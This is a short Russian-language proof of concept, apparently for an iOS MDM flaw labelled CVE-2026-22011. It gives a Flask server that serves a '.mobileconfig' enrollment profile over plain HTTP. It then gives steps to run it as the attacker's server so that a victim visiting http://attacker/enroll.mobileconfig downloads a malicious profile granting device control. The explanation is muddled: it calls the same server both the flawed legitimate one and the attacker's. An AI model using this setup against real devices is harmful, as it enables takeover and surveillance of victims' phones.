
PoC Flask-сервер для CVE-2026-22011, который раздаёт вредоносный MDM-профиль регистрации iOS по HTTP, обеспечивая перехват типа «человек посередине» и компрометацию устройства.
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file
app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
# Vulnerability: profile delivered without HTTPS
return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
Профиль регистрации MDM предоставляется по открытому HTTP без шифрования и проверки цифровой подписи. Злоумышленник в той же сети может перехватить запрос и заменить профиль вредоносным, получив права управления устройством.
Запустите HTTP-сервер атакующего:
python mdm_server.py
Когда жертва переходит по адресу http://attacker/enroll.mobileconfig, скачивается вредоносный профиль.